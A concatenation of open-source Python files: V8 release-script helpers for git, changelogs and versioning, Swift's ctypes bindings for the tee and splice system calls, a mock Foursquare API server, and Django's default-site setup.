# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import datetime
import httplib
import glob
import imp
import json
import os
import re
import shutil
import subprocess
import sys
import textwrap
import time
import urllib
import urllib2
from git_recipes import GitRecipesMixin
from git_recipes import GitFailedException
CHANGELOG_FILE = "ChangeLog"
DAY_IN_SECONDS = 24 * 60 * 60
PUSH_MSG_GIT_RE = re.compile(r".* \(based on (?P<git_rev>[a-fA-F0-9]+)\)$")
PUSH_MSG_NEW_RE = re.compile(r"^Version \d+\.\d+\.\d+$")
VERSION_FILE = os.path.join("include", "v8-version.h")
VERSION_RE = re.compile(r"^\d+\.\d+\.\d+(?:\.\d+)?$")
# V8 base directory.
V8_BASE = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
def TextToFile(text, file_name):
with open(file_name, "w") as f:
f.write(text)
def AppendToFile(text, file_name):
with open(file_name, "a") as f:
f.write(text)
def LinesInFile(file_name):
with open(file_name) as f:
for line in f:
yield line
def FileToText(file_name):
with open(file_name) as f:
return f.read()
def MSub(rexp, replacement, text):
return re.sub(rexp, replacement, text, flags=re.MULTILINE)
def Fill80(line):
# Replace tabs and remove surrounding space.
line = re.sub(r"\t", r" ", line.strip())
# Format with 8 characters indentation and line width 80.
return textwrap.fill(line, width=80, initial_indent=" ",
subsequent_indent=" ")
def MakeComment(text):
return MSub(r"^( ?)", "#", text)
def StripComments(text):
# Use split not splitlines to keep terminal newlines.
return "\n".join(filter(lambda x: not x.startswith("#"), text.split("\n")))
def MakeChangeLogBody(commit_messages, auto_format=False):
result = ""
added_titles = set()
for (title, body, author) in commit_messages:
# TODO(machenbach): Better check for reverts. A revert should remove the
# original CL from the actual log entry.
title = title.strip()
if auto_format:
# Only add commits that set the LOG flag correctly.
log_exp = r"^[ \t]*LOG[ \t]*=[ \t]*(?:(?:Y(?:ES)?)|TRUE)"
if not re.search(log_exp, body, flags=re.I | re.M):
continue
# Never include reverts.
if title.startswith("Revert "):
continue
# Don't include duplicates.
if title in added_titles:
continue
# Add and format the commit's title and bug reference. Move dot to the end.
added_titles.add(title)
raw_title = re.sub(r"(\.|\?|!)$", "", title)
bug_reference = MakeChangeLogBugReference(body)
space = " " if bug_reference else ""
result += "%s\n" % Fill80("%s%s%s." % (raw_title, space, bug_reference))
# Append the commit's author for reference if not in auto-format mode.
if not auto_format:
result += "%s\n" % Fill80("(%s)" % author.strip())
result += "\n"
return result
def MakeChangeLogBugReference(body):
"""Grep for "BUG=xxxx" lines in the commit message and convert them to
"(issue xxxx)".
"""
crbugs = []
v8bugs = []
def AddIssues(text):
ref = re.match(r"^BUG[ \t]*=[ \t]*(.+)$", text.strip())
if not ref:
return
for bug in ref.group(1).split(","):
bug = bug.strip()
match = re.match(r"^v8:(\d+)$", bug)
if match: v8bugs.append(int(match.group(1)))
else:
match = re.match(r"^(?:chromium:)?(\d+)$", bug)
if match: crbugs.append(int(match.group(1)))
# Add issues to crbugs and v8bugs.
map(AddIssues, body.splitlines())
# Filter duplicates, sort, stringify.
crbugs = map(str, sorted(set(crbugs)))
v8bugs = map(str, sorted(set(v8bugs)))
bug_groups = []
def FormatIssues(prefix, bugs):
if len(bugs) > 0:
plural = "s" if len(bugs) > 1 else ""
bug_groups.append("%sissue%s %s" % (prefix, plural, ", ".join(bugs)))
FormatIssues("", v8bugs)
FormatIssues("Chromium ", crbugs)
if len(bug_groups) > 0:
return "(%s)" % ", ".join(bug_groups)
else:
return ""
def SortingKey(version):
"""Key for sorting version number strings: '3.11' > '3.2.1.1'"""
version_keys = map(int, version.split("."))
# Fill up to full version numbers to normalize comparison.
while len(version_keys) < 4: # pragma: no cover
version_keys.append(0)
# Fill digits.
return ".".join(map("{0:04d}".format, version_keys))
# Some commands don't like the pipe, e.g. calling vi from within the script or
# from subscripts like git cl upload.
def Command(cmd, args="", prefix="", pipe=True, cwd=None):
cwd = cwd or os.getcwd()
# TODO(machenbach): Use timeout.
cmd_line = "%s %s %s" % (prefix, cmd, args)
print "Command: %s" % cmd_line
print "in %s" % cwd
sys.stdout.flush()
try:
if pipe:
return subprocess.check_output(cmd_line, shell=True, cwd=cwd)
else:
return subprocess.check_call(cmd_line, shell=True, cwd=cwd)
except subprocess.CalledProcessError:
return None
finally:
sys.stdout.flush()
sys.stderr.flush()
# Wrapper for side effects.
class SideEffectHandler(object): # pragma: no cover
def Call(self, fun, *args, **kwargs):
return fun(*args, **kwargs)
def Command(self, cmd, args="", prefix="", pipe=True, cwd=None):
return Command(cmd, args, prefix, pipe, cwd=cwd)
def ReadLine(self):
return sys.stdin.readline().strip()
def ReadURL(self, url, params=None):
# pylint: disable=E1121
url_fh = urllib2.urlopen(url, params, 60)
try:
return url_fh.read()
finally:
url_fh.close()
def ReadClusterFuzzAPI(self, api_key, **params):
params["api_key"] = api_key.strip()
params = urllib.urlencode(params)
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPSConnection("backend-dot-cluster-fuzz.appspot.com")
conn.request("POST", "/_api/", params, headers)
response = conn.getresponse()
data = response.read()
try:
return json.loads(data)
except:
print data
print "ERROR: Could not read response. Is your key valid?"
raise
def Sleep(self, seconds):
time.sleep(seconds)
def GetDate(self):
return datetime.date.today().strftime("%Y-%m-%d")
def GetUTCStamp(self):
return time.mktime(datetime.datetime.utcnow().timetuple())
DEFAULT_SIDE_EFFECT_HANDLER = SideEffectHandler()
class NoRetryException(Exception):
pass
class VCInterface(object):
def InjectStep(self, step):
    self.step = step
def Pull(self):
raise NotImplementedError()
def Fetch(self):
raise NotImplementedError()
def GetTags(self):
raise NotImplementedError()
def GetBranches(self):
raise NotImplementedError()
def MasterBranch(self):
raise NotImplementedError()
def CandidateBranch(self):
raise NotImplementedError()
def RemoteMasterBranch(self):
raise NotImplementedError()
def RemoteCandidateBranch(self):
raise NotImplementedError()
def RemoteBranch(self, name):
raise NotImplementedError()
def CLLand(self):
raise NotImplementedError()
def Tag(self, tag, remote, message):
"""Sets a tag for the current commit.
Assumptions: The commit already landed and the commit message is unique.
"""
raise NotImplementedError()
class GitInterface(VCInterface):
def Pull(self):
self.step.GitPull()
def Fetch(self):
self.step.Git("fetch")
def GetTags(self):
return self.step.Git("tag").strip().splitlines()
def GetBranches(self):
# Get relevant remote branches, e.g. "branch-heads/3.25".
branches = filter(
lambda s: re.match(r"^branch\-heads/\d+\.\d+$", s),
self.step.GitRemotes())
# Remove 'branch-heads/' prefix.
return map(lambda s: s[13:], branches)
def MasterBranch(self):
return "master"
def CandidateBranch(self):
return "candidates"
def RemoteMasterBranch(self):
return "origin/master"
def RemoteCandidateBranch(self):
return "origin/candidates"
def RemoteBranch(self, name):
# Assume that if someone "fully qualified" the ref, they know what they
# want.
if name.startswith('refs/'):
return name
if name in ["candidates", "master"]:
return "refs/remotes/origin/%s" % name
try:
# Check if branch is in heads.
if self.step.Git("show-ref refs/remotes/origin/%s" % name).strip():
return "refs/remotes/origin/%s" % name
except GitFailedException:
pass
try:
# Check if branch is in branch-heads.
if self.step.Git("show-ref refs/remotes/branch-heads/%s" % name).strip():
return "refs/remotes/branch-heads/%s" % name
except GitFailedException:
pass
self.Die("Can't find remote of %s" % name)
def Tag(self, tag, remote, message):
# Wait for the commit to appear. Assumes unique commit message titles (this
# is the case for all automated merge and push commits - also no title is
# the prefix of another title).
commit = None
for wait_interval in [3, 7, 15, 35, 45, 60]:
self.step.Git("fetch")
commit = self.step.GitLog(n=1, format="%H", grep=message, branch=remote)
if commit:
break
print("The commit has not replicated to git. Waiting for %s seconds." %
wait_interval)
self.step._side_effect_handler.Sleep(wait_interval)
else:
self.step.Die("Couldn't determine commit for setting the tag. Maybe the "
"git updater is lagging behind?")
self.step.Git("tag %s %s" % (tag, commit))
self.step.Git("push origin %s" % tag)
def CLLand(self):
self.step.GitCLLand()
class Step(GitRecipesMixin):
def __init__(self, text, number, config, state, options, handler):
self._text = text
self._number = number
self._config = config
self._state = state
self._options = options
self._side_effect_handler = handler
self.vc = GitInterface()
self.vc.InjectStep(self)
# The testing configuration might set a different default cwd.
self.default_cwd = (self._config.get("DEFAULT_CWD") or
os.path.join(self._options.work_dir, "v8"))
assert self._number >= 0
assert self._config is not None
assert self._state is not None
assert self._side_effect_handler is not None
def __getitem__(self, key):
# Convenience method to allow direct [] access on step classes for
# manipulating the backed state dict.
return self._state.get(key)
def __setitem__(self, key, value):
# Convenience method to allow direct [] access on step classes for
# manipulating the backed state dict.
self._state[key] = value
def Config(self, key):
return self._config[key]
def Run(self):
# Restore state.
state_file = "%s-state.json" % self._config["PERSISTFILE_BASENAME"]
if not self._state and os.path.exists(state_file):
self._state.update(json.loads(FileToText(state_file)))
print ">>> Step %d: %s" % (self._number, self._text)
try:
return self.RunStep()
finally:
# Persist state.
TextToFile(json.dumps(self._state), state_file)
def RunStep(self): # pragma: no cover
raise NotImplementedError
def Retry(self, cb, retry_on=None, wait_plan=None):
""" Retry a function.
Params:
cb: The function to retry.
retry_on: A callback that takes the result of the function and returns
True if the function should be retried. A function throwing an
exception is always retried.
wait_plan: A list of waiting delays between retries in seconds. The
maximum number of retries is len(wait_plan).
"""
retry_on = retry_on or (lambda x: False)
wait_plan = list(wait_plan or [])
wait_plan.reverse()
while True:
got_exception = False
try:
result = cb()
except NoRetryException as e:
raise e
except Exception as e:
got_exception = e
if got_exception or retry_on(result):
if not wait_plan: # pragma: no cover
raise Exception("Retried too often. Giving up. Reason: %s" %
str(got_exception))
wait_time = wait_plan.pop()
print "Waiting for %f seconds." % wait_time
self._side_effect_handler.Sleep(wait_time)
print "Retrying..."
else:
return result
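  # Usage sketch (an illustration, not part of the original script): retry a
  # flaky read up to three times, waiting 5, 30 and 60 seconds between
  # attempts, and treat a None result as a failure.
  #
  #   result = self.Retry(lambda: self._side_effect_handler.ReadURL(url),
  #                       retry_on=lambda r: r is None,
  #                       wait_plan=[5, 30, 60])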
def ReadLine(self, default=None):
# Don't prompt in forced mode.
if self._options.force_readline_defaults and default is not None:
print "%s (forced)" % default
return default
else:
return self._side_effect_handler.ReadLine()
def Command(self, name, args, cwd=None):
cmd = lambda: self._side_effect_handler.Command(
name, args, "", True, cwd=cwd or self.default_cwd)
return self.Retry(cmd, None, [5])
def Git(self, args="", prefix="", pipe=True, retry_on=None, cwd=None):
cmd = lambda: self._side_effect_handler.Command(
"git", args, prefix, pipe, cwd=cwd or self.default_cwd)
result = self.Retry(cmd, retry_on, [5, 30])
if result is None:
raise GitFailedException("'git %s' failed." % args)
return result
def Editor(self, args):
if self._options.requires_editor:
return self._side_effect_handler.Command(
os.environ["EDITOR"],
args,
pipe=False,
cwd=self.default_cwd)
def ReadURL(self, url, params=None, retry_on=None, wait_plan=None):
wait_plan = wait_plan or [3, 60, 600]
cmd = lambda: self._side_effect_handler.ReadURL(url, params)
return self.Retry(cmd, retry_on, wait_plan)
def GetDate(self):
return self._side_effect_handler.GetDate()
def Die(self, msg=""):
if msg != "":
print "Error: %s" % msg
print "Exiting"
raise Exception(msg)
def DieNoManualMode(self, msg=""):
if not self._options.manual: # pragma: no cover
msg = msg or "Only available in manual mode."
self.Die(msg)
def Confirm(self, msg):
print "%s [Y/n] " % msg,
answer = self.ReadLine(default="Y")
return answer == "" or answer == "Y" or answer == "y"
def DeleteBranch(self, name, cwd=None):
for line in self.GitBranch(cwd=cwd).splitlines():
if re.match(r"\*?\s*%s$" % re.escape(name), line):
msg = "Branch %s exists, do you want to delete it?" % name
if self.Confirm(msg):
self.GitDeleteBranch(name, cwd=cwd)
print "Branch %s deleted." % name
else:
msg = "Can't continue. Please delete branch %s and try again." % name
self.Die(msg)
def InitialEnvironmentChecks(self, cwd):
# Cancel if this is not a git checkout.
if not os.path.exists(os.path.join(cwd, ".git")): # pragma: no cover
self.Die("This is not a git checkout, this script won't work for you.")
# Cancel if EDITOR is unset or not executable.
if (self._options.requires_editor and (not os.environ.get("EDITOR") or
self.Command(
"which", os.environ["EDITOR"]) is None)): # pragma: no cover
self.Die("Please set your EDITOR environment variable, you'll need it.")
def CommonPrepare(self):
# Check for a clean workdir.
if not self.GitIsWorkdirClean(): # pragma: no cover
self.Die("Workspace is not clean. Please commit or undo your changes.")
# Checkout master in case the script was left on a work branch.
self.GitCheckout('origin/master')
# Fetch unfetched revisions.
self.vc.Fetch()
def PrepareBranch(self):
# Delete the branch that will be created later if it exists already.
self.DeleteBranch(self._config["BRANCHNAME"])
def CommonCleanup(self):
self.GitCheckout('origin/master')
self.GitDeleteBranch(self._config["BRANCHNAME"])
# Clean up all temporary files.
for f in glob.iglob("%s*" % self._config["PERSISTFILE_BASENAME"]):
if os.path.isfile(f):
os.remove(f)
if os.path.isdir(f):
shutil.rmtree(f)
def ReadAndPersistVersion(self, prefix=""):
def ReadAndPersist(var_name, def_name):
match = re.match(r"^#define %s\s+(\d*)" % def_name, line)
if match:
value = match.group(1)
self["%s%s" % (prefix, var_name)] = value
for line in LinesInFile(os.path.join(self.default_cwd, VERSION_FILE)):
for (var_name, def_name) in [("major", "V8_MAJOR_VERSION"),
("minor", "V8_MINOR_VERSION"),
("build", "V8_BUILD_NUMBER"),
("patch", "V8_PATCH_LEVEL")]:
ReadAndPersist(var_name, def_name)
def WaitForLGTM(self):
print ("Please wait for an LGTM, then type \"LGTM<Return>\" to commit "
"your change. (If you need to iterate on the patch or double check "
"that it's sane, do so in another shell, but remember to not "
"change the headline of the uploaded CL.")
answer = ""
while answer != "LGTM":
print "> ",
answer = self.ReadLine(None if self._options.wait_for_lgtm else "LGTM")
if answer != "LGTM":
print "That was not 'LGTM'."
def WaitForResolvingConflicts(self, patch_file):
print("Applying the patch \"%s\" failed. Either type \"ABORT<Return>\", "
"or resolve the conflicts, stage *all* touched files with "
"'git add', and type \"RESOLVED<Return>\"")
self.DieNoManualMode()
answer = ""
while answer != "RESOLVED":
if answer == "ABORT":
self.Die("Applying the patch failed.")
if answer != "":
print "That was not 'RESOLVED' or 'ABORT'."
print "> ",
answer = self.ReadLine()
# Takes a file containing the patch to apply as first argument.
def ApplyPatch(self, patch_file, revert=False):
try:
self.GitApplyPatch(patch_file, revert)
except GitFailedException:
self.WaitForResolvingConflicts(patch_file)
def GetVersionTag(self, revision):
tag = self.Git("describe --tags %s" % revision).strip()
if VERSION_RE.match(tag):
return tag
else:
return None
def GetRecentReleases(self, max_age):
# Make sure tags are fetched.
self.Git("fetch origin +refs/tags/*:refs/tags/*")
# Current timestamp.
time_now = int(self._side_effect_handler.GetUTCStamp())
# List every tag from a given period.
revisions = self.Git("rev-list --max-age=%d --tags" %
int(time_now - max_age)).strip()
    # Filter out revisions whose tag is off by one or more commits.
return filter(lambda r: self.GetVersionTag(r), revisions.splitlines())
def GetLatestVersion(self):
# Use cached version if available.
if self["latest_version"]:
return self["latest_version"]
# Make sure tags are fetched.
self.Git("fetch origin +refs/tags/*:refs/tags/*")
version = sorted(filter(VERSION_RE.match, self.vc.GetTags()),
key=SortingKey, reverse=True)[0]
self["latest_version"] = version
return version
def GetLatestRelease(self):
"""The latest release is the git hash of the latest tagged version.
This revision should be rolled into chromium.
"""
latest_version = self.GetLatestVersion()
# The latest release.
latest_hash = self.GitLog(n=1, format="%H", branch=latest_version)
assert latest_hash
return latest_hash
def GetLatestReleaseBase(self, version=None):
"""The latest release base is the latest revision that is covered in the
last change log file. It doesn't include cherry-picked patches.
"""
latest_version = version or self.GetLatestVersion()
# Strip patch level if it exists.
latest_version = ".".join(latest_version.split(".")[:3])
# The latest release base.
latest_hash = self.GitLog(n=1, format="%H", branch=latest_version)
assert latest_hash
title = self.GitLog(n=1, format="%s", git_hash=latest_hash)
match = PUSH_MSG_GIT_RE.match(title)
if match:
# Legacy: In the old process there's one level of indirection. The
# version is on the candidates branch and points to the real release
# base on master through the commit message.
return match.group("git_rev")
match = PUSH_MSG_NEW_RE.match(title)
if match:
# This is a new-style v8 version branched from master. The commit
# "latest_hash" is the version-file change. Its parent is the release
# base on master.
return self.GitLog(n=1, format="%H", git_hash="%s^" % latest_hash)
self.Die("Unknown latest release: %s" % latest_hash)
def ArrayToVersion(self, prefix):
return ".".join([self[prefix + "major"],
self[prefix + "minor"],
self[prefix + "build"],
self[prefix + "patch"]])
def StoreVersion(self, version, prefix):
version_parts = version.split(".")
if len(version_parts) == 3:
version_parts.append("0")
major, minor, build, patch = version_parts
self[prefix + "major"] = major
self[prefix + "minor"] = minor
self[prefix + "build"] = build
self[prefix + "patch"] = patch
def SetVersion(self, version_file, prefix):
output = ""
for line in FileToText(version_file).splitlines():
if line.startswith("#define V8_MAJOR_VERSION"):
line = re.sub("\d+$", self[prefix + "major"], line)
elif line.startswith("#define V8_MINOR_VERSION"):
line = re.sub("\d+$", self[prefix + "minor"], line)
elif line.startswith("#define V8_BUILD_NUMBER"):
line = re.sub("\d+$", self[prefix + "build"], line)
elif line.startswith("#define V8_PATCH_LEVEL"):
line = re.sub("\d+$", self[prefix + "patch"], line)
elif (self[prefix + "candidate"] and
line.startswith("#define V8_IS_CANDIDATE_VERSION")):
line = re.sub("\d+$", self[prefix + "candidate"], line)
output += "%s\n" % line
TextToFile(output, version_file)
class BootstrapStep(Step):
MESSAGE = "Bootstapping v8 checkout."
def RunStep(self):
if os.path.realpath(self.default_cwd) == os.path.realpath(V8_BASE):
self.Die("Can't use v8 checkout with calling script as work checkout.")
# Directory containing the working v8 checkout.
if not os.path.exists(self._options.work_dir):
os.makedirs(self._options.work_dir)
if not os.path.exists(self.default_cwd):
self.Command("fetch", "v8", cwd=self._options.work_dir)
class UploadStep(Step):
MESSAGE = "Upload for code review."
def RunStep(self):
if self._options.reviewer:
print "Using account %s for review." % self._options.reviewer
reviewer = self._options.reviewer
else:
print "Please enter the email address of a V8 reviewer for your patch: ",
self.DieNoManualMode("A reviewer must be specified in forced mode.")
reviewer = self.ReadLine()
self.GitUpload(reviewer, self._options.author, self._options.force_upload,
bypass_hooks=self._options.bypass_upload_hooks,
cc=self._options.cc)
class DetermineV8Sheriff(Step):
MESSAGE = "Determine the V8 sheriff for code review."
def RunStep(self):
self["sheriff"] = None
if not self._options.sheriff: # pragma: no cover
return
# The sheriff determined by the rotation on the waterfall has a
# @google.com account.
url = "https://chromium-build.appspot.com/p/chromium/sheriff_v8.js"
match = re.match(r"document\.write\('(\w+)'\)", self.ReadURL(url))
# If "channel is sheriff", we can't match an account.
if match:
g_name = match.group(1)
# Optimistically assume that google and chromium account name are the
# same.
self["sheriff"] = g_name + "@chromium.org"
self._options.reviewer = ("%s,%s" %
(self["sheriff"], self._options.reviewer))
print "Found active sheriff: %s" % self["sheriff"]
else:
print "No active sheriff found."
def MakeStep(step_class=Step, number=0, state=None, config=None,
options=None, side_effect_handler=DEFAULT_SIDE_EFFECT_HANDLER):
# Allow to pass in empty dictionaries.
state = state if state is not None else {}
config = config if config is not None else {}
try:
message = step_class.MESSAGE
except AttributeError:
message = step_class.__name__
return step_class(message, number=number, config=config,
state=state, options=options,
handler=side_effect_handler)
class ScriptsBase(object):
def __init__(self,
config=None,
side_effect_handler=DEFAULT_SIDE_EFFECT_HANDLER,
state=None):
self._config = config or self._Config()
self._side_effect_handler = side_effect_handler
self._state = state if state is not None else {}
def _Description(self):
return None
def _PrepareOptions(self, parser):
pass
def _ProcessOptions(self, options):
return True
def _Steps(self): # pragma: no cover
raise Exception("Not implemented.")
def _Config(self):
return {}
def MakeOptions(self, args=None):
parser = argparse.ArgumentParser(description=self._Description())
parser.add_argument("-a", "--author", default="",
help="The author email used for rietveld.")
parser.add_argument("--dry-run", default=False, action="store_true",
help="Perform only read-only actions.")
parser.add_argument("-r", "--reviewer", default="",
help="The account name to be used for reviews.")
parser.add_argument("--sheriff", default=False, action="store_true",
help=("Determine current sheriff to review CLs. On "
"success, this will overwrite the reviewer "
"option."))
parser.add_argument("-s", "--step",
help="Specify the step where to start work. Default: 0.",
default=0, type=int)
parser.add_argument("--work-dir",
help=("Location where to bootstrap a working v8 "
"checkout."))
self._PrepareOptions(parser)
if args is None: # pragma: no cover
options = parser.parse_args()
else:
options = parser.parse_args(args)
# Process common options.
if options.step < 0: # pragma: no cover
print "Bad step number %d" % options.step
parser.print_help()
return None
# Defaults for options, common to all scripts.
options.manual = getattr(options, "manual", True)
options.force = getattr(options, "force", False)
options.bypass_upload_hooks = False
# Derived options.
options.requires_editor = not options.force
options.wait_for_lgtm = not options.force
options.force_readline_defaults = not options.manual
options.force_upload = not options.manual
# Process script specific options.
if not self._ProcessOptions(options):
parser.print_help()
return None
if not options.work_dir:
options.work_dir = "/tmp/v8-release-scripts-work-dir"
return options
def RunSteps(self, step_classes, args=None):
options = self.MakeOptions(args)
if not options:
return 1
state_file = "%s-state.json" % self._config["PERSISTFILE_BASENAME"]
if options.step == 0 and os.path.exists(state_file):
os.remove(state_file)
steps = []
for (number, step_class) in enumerate([BootstrapStep] + step_classes):
steps.append(MakeStep(step_class, number, self._state, self._config,
options, self._side_effect_handler))
for step in steps[options.step:]:
if step.Run():
return 0
return 0
def Run(self, args=None):
return self.RunSteps(self._Steps(), args)
| apache-2.0 |
daasbank/swift | swift/common/splice.py | 36 | 5500 | # Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Bindings to the `tee` and `splice` system calls
'''
import os
import operator
import six
import ctypes
import ctypes.util
__all__ = ['tee', 'splice']
c_loff_t = ctypes.c_long
# python 2.6 doesn't have c_ssize_t
c_ssize_t = getattr(ctypes, 'c_ssize_t', ctypes.c_long)
class Tee(object):
'''Binding to `tee`'''
__slots__ = '_c_tee',
def __init__(self):
libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)
try:
c_tee = libc.tee
except AttributeError:
self._c_tee = None
return
c_tee.argtypes = [
ctypes.c_int,
ctypes.c_int,
ctypes.c_size_t,
ctypes.c_uint
]
c_tee.restype = c_ssize_t
def errcheck(result, func, arguments):
if result == -1:
errno = ctypes.set_errno(0)
raise IOError(errno, 'tee: %s' % os.strerror(errno))
else:
return result
c_tee.errcheck = errcheck
self._c_tee = c_tee
def __call__(self, fd_in, fd_out, len_, flags):
'''See `man 2 tee`
File-descriptors can be file-like objects with a `fileno` method, or
integers.
Flags can be an integer value, or a list of flags (exposed on
`splice`).
This function returns the number of bytes transferred (i.e. the actual
result of the call to `tee`).
Upon other errors, an `IOError` is raised with the proper `errno` set.
'''
if not self.available:
raise EnvironmentError('tee not available')
if not isinstance(flags, six.integer_types):
c_flags = six.moves.reduce(operator.or_, flags, 0)
else:
c_flags = flags
c_fd_in = getattr(fd_in, 'fileno', lambda: fd_in)()
c_fd_out = getattr(fd_out, 'fileno', lambda: fd_out)()
return self._c_tee(c_fd_in, c_fd_out, len_, c_flags)
@property
def available(self):
'''Availability of `tee`'''
return self._c_tee is not None
tee = Tee()
del Tee
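# Hypothetical demonstration of the binding above (editor-added sketch, not
# part of the original module): Linux only, and `tee` requires both file
# descriptors to be pipes. It duplicates pipe data without consuming it.
def _tee_example():
    if not tee.available:
        return
    r1, w1 = os.pipe()
    r2, w2 = os.pipe()
    os.write(w1, b'data')
    copied = tee(r1, w2, 4, 0)        # duplicate 4 bytes from pipe 1 to pipe 2
    assert copied == 4
    assert os.read(r2, 4) == b'data'  # the copy arrived on the second pipe
    assert os.read(r1, 4) == b'data'  # the original data is still readable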
class Splice(object):
'''Binding to `splice`'''
# From `bits/fcntl-linux.h`
SPLICE_F_MOVE = 1
SPLICE_F_NONBLOCK = 2
SPLICE_F_MORE = 4
SPLICE_F_GIFT = 8
__slots__ = '_c_splice',
def __init__(self):
libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)
try:
c_splice = libc.splice
except AttributeError:
self._c_splice = None
return
c_loff_t_p = ctypes.POINTER(c_loff_t)
c_splice.argtypes = [
ctypes.c_int, c_loff_t_p,
ctypes.c_int, c_loff_t_p,
ctypes.c_size_t,
ctypes.c_uint
]
c_splice.restype = c_ssize_t
def errcheck(result, func, arguments):
if result == -1:
errno = ctypes.set_errno(0)
raise IOError(errno, 'splice: %s' % os.strerror(errno))
else:
off_in = arguments[1]
off_out = arguments[3]
return (
result,
off_in.contents.value if off_in is not None else None,
off_out.contents.value if off_out is not None else None)
c_splice.errcheck = errcheck
self._c_splice = c_splice
def __call__(self, fd_in, off_in, fd_out, off_out, len_, flags):
'''See `man 2 splice`
File-descriptors can be file-like objects with a `fileno` method, or
integers.
Flags can be an integer value, or a list of flags (exposed on this
object).
Returns a tuple of the result of the `splice` call, the output value of
`off_in` and the output value of `off_out` (or `None` for any of these
output values, if applicable).
Upon other errors, an `IOError` is raised with the proper `errno` set.
Note: if you want to pass `NULL` as value for `off_in` or `off_out` to
the system call, you must pass `None`, *not* 0!
'''
if not self.available:
raise EnvironmentError('splice not available')
if not isinstance(flags, six.integer_types):
c_flags = six.moves.reduce(operator.or_, flags, 0)
else:
c_flags = flags
c_fd_in = getattr(fd_in, 'fileno', lambda: fd_in)()
c_fd_out = getattr(fd_out, 'fileno', lambda: fd_out)()
c_off_in = \
ctypes.pointer(c_loff_t(off_in)) if off_in is not None else None
c_off_out = \
ctypes.pointer(c_loff_t(off_out)) if off_out is not None else None
return self._c_splice(
c_fd_in, c_off_in, c_fd_out, c_off_out, len_, c_flags)
@property
def available(self):
'''Availability of `splice`'''
return self._c_splice is not None
splice = Splice()
del Splice
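# Hypothetical demonstration of `splice` (editor-added sketch, not part of the
# original module): Linux only; moves bytes from a pipe into a regular file
# without copying them through user space. At least one end must be a pipe.
def _splice_example():
    if not splice.available:
        return
    import tempfile
    r, w = os.pipe()
    with tempfile.TemporaryFile() as fp:
        os.write(w, b'data')
        res, _, _ = splice(r, None, fp, None, 4, splice.SPLICE_F_MOVE)
        assert res == 4               # four bytes were transferred
        fp.seek(0)
        assert fp.read() == b'data'   # and landed in the file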
| apache-2.0 |
omondiy/foursquared.eclair | mock_server/playfoursquare.py | 127 | 1999 | #!/usr/bin/python2.6
#
# Simple http server to emulate api.playfoursquare.com
import logging
import shutil
import urlparse
import SimpleHTTPServer
import BaseHTTPServer
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handle playfoursquare.com requests, for testing."""
def do_GET(self):
logging.warn('do_GET: %s, %s', self.command, self.path)
url = urlparse.urlparse(self.path)
logging.warn('do_GET: %s', url)
query = urlparse.parse_qs(url.query)
query_keys = list(query.keys())  # parse_qs returns a dict of name -> values
response = self.handle_url(url)
if response != None:
self.send_200()
shutil.copyfileobj(response, self.wfile)
self.wfile.close()
do_POST = do_GET
def handle_url(self, url):
path = None
if url.path == '/v1/venue':
path = '../captures/api/v1/venue.xml'
elif url.path == '/v1/venues':
path = '../captures/api/v1/venues.xml'
elif url.path == '/v1/user':
path = '../captures/api/v1/user.xml'
elif url.path == '/v1/checkcity':
path = '../captures/api/v1/checkcity.xml'
elif url.path == '/v1/checkins':
path = '../captures/api/v1/checkins.xml'
elif url.path == '/v1/cities':
path = '../captures/api/v1/cities.xml'
elif url.path == '/v1/switchcity':
path = '../captures/api/v1/switchcity.xml'
elif url.path == '/v1/tips':
path = '../captures/api/v1/tips.xml'
elif url.path == '/v1/checkin':
path = '../captures/api/v1/checkin.xml'
if path is None:
self.send_error(404)
else:
logging.warn('Using: %s' % path)
return open(path)
def send_200(self):
self.send_response(200)
self.send_header('Content-type', 'text/xml')
self.end_headers()
def main():
server_address = ('0.0.0.0', 8080)
httpd = BaseHTTPServer.HTTPServer(server_address, RequestHandler)
sa = httpd.socket.getsockname()
print "Serving HTTP on", sa[0], "port", sa[1], "..."
httpd.serve_forever()
if __name__ == '__main__':
main()
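# Hypothetical smoke test (editor-added sketch): with the server above running
# on localhost:8080, fetch one of the mocked endpoints. The path comes from
# handle_url; urllib2 is used because this script targets Python 2.
def fetch_example():
    import urllib2
    return urllib2.urlopen('http://localhost:8080/v1/venue').read()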
| apache-2.0 |
IV-GII/SocialCookies | ENV1/lib/python2.7/site-packages/django/contrib/sites/management.py | 232 | 1587 | """
Creates the default Site object.
"""
from django.db.models import signals
from django.db import connections
from django.db import router
from django.contrib.sites.models import Site
from django.contrib.sites import models as site_app
from django.core.management.color import no_style
def create_default_site(app, created_models, verbosity, db, **kwargs):
# Only create the default sites in databases where Django created the table
if Site in created_models and router.allow_syncdb(db, Site):
# The default settings set SITE_ID = 1, and some tests in Django's test
# suite rely on this value. However, if database sequences are reused
# (e.g. in the test suite after flush/syncdb), it isn't guaranteed that
# the next id will be 1, so we coerce it. See #15573 and #16353. This
# can also crop up outside of tests - see #15346.
if verbosity >= 2:
print("Creating example.com Site object")
Site(pk=1, domain="example.com", name="example.com").save(using=db)
# We set an explicit pk instead of relying on auto-incrementation,
# so we need to reset the database sequence. See #17415.
sequence_sql = connections[db].ops.sequence_reset_sql(no_style(), [Site])
if sequence_sql:
if verbosity >= 2:
print("Resetting sequence")
cursor = connections[db].cursor()
for command in sequence_sql:
cursor.execute(command)
Site.objects.clear_cache()
signals.post_syncdb.connect(create_default_site, sender=site_app)
| gpl-2.0 |
